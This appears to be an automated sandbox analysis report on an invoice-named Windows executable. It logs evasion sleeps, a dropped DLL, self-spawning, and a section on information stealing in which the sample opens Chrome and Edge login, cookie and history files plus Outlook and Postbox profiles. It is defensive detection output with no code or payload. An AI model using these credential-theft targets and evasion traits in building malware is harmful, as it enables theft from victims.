Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Window / User API: threadDelayed 1732 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Window / User API: threadDelayed 8085 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn497A.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API coverage: 1.7 %
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -32281802128991695s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 4136 Thread sleep count: 1732 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599722s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 4136 Thread sleep count: 8085 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -599110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -598032s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597907s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597782s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597669s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597263s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597153s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -597047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -596110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -594110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -593985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -593860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -593735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.00000000074F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.2991384453.0000000007498000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00403741 GetTempPathW,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LdrInitializeThunk,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,ShowWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,LdrInitializeThunk,LdrInitializeThunk, 0_2_00403741
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process created: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe "C:\Users\user\Desktop\Factura Honorarios 2024-10.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405D99
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-10.exe PID: 5852, type: MEMORYSTR
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Yara match File source: 00000004.00000002.3011994404.0000000037AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-10.exe PID: 5852, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura Honorarios 2024-10.exe PID: 5852, type: MEMORYSTR